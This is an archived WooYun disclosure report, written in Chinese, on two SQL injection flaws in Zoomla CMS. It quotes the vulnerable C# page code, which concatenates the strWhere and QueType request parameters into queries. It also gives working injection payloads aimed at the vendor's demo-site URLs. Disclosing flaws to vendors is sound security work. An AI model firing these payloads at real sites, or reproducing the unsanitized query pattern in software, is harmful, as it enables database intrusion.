乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-09: 细节已通知厂商并且等待厂商处理中 2014-05-09: 厂商已经确认,细节仅向厂商公开 2014-05-12: 细节向第三方安全合作伙伴开放 2014-07-03: 细节向核心白帽子及相关领域专家公开 2014-07-13: 细节向普通白帽子公开 2014-07-23: 细节向实习白帽子公开 2014-08-07: 细节向公众公开
逐浪最新版 是2014年4月发布的
地址
http://demo.zoomla.cn/Guest/ask/List.aspx
源码如下
protected void Page_Load(object sender, EventArgs e){ string str = ""; if (!base.IsPostBack) { DataTable table; if (this.b_User.CheckLogin()) { this.user.Text = this.b_User.GetLogin().UserName; string userName = this.b_User.GetLogin().UserName; str = " And UserName<>'" + userName + "'"; } if (!string.IsNullOrEmpty(base.Request["strWhere"])) { table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTime desc"); //参数没处理 } else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"])) { table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc");//这里也没处理 } else { table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc"); } string str3 = ""; string item = ""; IList<string> list = new List<string>(); Repeater repeater = new Repeater(); if (table != null) { foreach (DataRow row in table.Rows) { if (string.IsNullOrEmpty(str3)) { item = row["Qcontent"].ToString(); list.Add(item); } } } repeater.DataSource = list; repeater.DataBind(); if (table != null) { this.Bind(table); } if (table != null) { table.Dispose(); } list.Clear(); }}
第二处SQL注射:之前2月份提交 WooYun: 逐浪cms通用型Sql注入漏洞 修复不完善依然存在注入
protected void Page_Load(object sender, EventArgs e){ if (!base.IsPostBack) { DataTable table; string str = base.Request["ID"]; string strWhere = ""; if (this.b_User.CheckLogin()) { string userName = this.b_User.GetLogin().UserName; this.user.Text = userName; strWhere = " UserName='" + userName + "'"; } if (string.IsNullOrEmpty(base.Request["QueType"]) && string.IsNullOrEmpty(str)) { table = this.b_Ask.Sel(strWhere, ""); } else if (string.IsNullOrEmpty(base.Request["QueType"]) && !string.IsNullOrEmpty(str)) { table = this.b_Ask.Sel(strWhere + " and ID=" + str, ""); } else { table = this.b_Ask.Sel(" QueType like'%" + base.Request["QueType"].ToString() + "%'" + strWhere, ""); //存在注入 } string str5 = ""; string item = ""; IList<string> list = new List<string>(); Repeater repeater = new Repeater(); if (table != null) { foreach (DataRow row in table.Rows) { if (string.IsNullOrEmpty(str5)) { item = row["Qcontent"].ToString(); list.Add(item); } } } repeater.DataSource = list; repeater.DataBind(); if (table != null) { this.Bind(table); } if (table != null) { table.Dispose(); } list.Clear(); }}
访问
post提交
strWhere=%' and (select @@version) >0 and '%'='
第二处SQL注射
http://demo.zoomla.cn/Guest/ask/MyAskList.aspx
提交
QueType=' and (select @@version)>0 and '%'='
再次修复
危害等级:中
漏洞Rank:6
确认时间:2014-05-09 17:19
感谢
暂无